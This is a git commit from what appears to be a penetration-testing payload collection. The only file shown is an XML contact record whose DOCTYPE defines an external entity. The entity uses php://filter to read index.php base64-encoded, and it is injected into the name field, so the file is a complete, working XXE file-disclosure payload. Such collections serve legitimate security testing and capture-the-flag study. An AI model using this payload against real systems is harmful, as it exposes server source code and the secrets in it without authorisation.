Fix name's capitalization

This commit is contained in:
Swissky
2019-03-07 00:07:55 +01:00
parent 21d1fe7eee
commit 404afd1d71
327 changed files with 0 additions and 198 deletions

View File

@@ -0,0 +1,10 @@
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
<contact>
<name>Jean &xxe; Dupont</name>
<phone>00 11 22 33 44</phone>
<adress>42 rue du CTF</adress>
<zipcode>75000</zipcode>
<city>Paris</city>
</contact>
</contacts>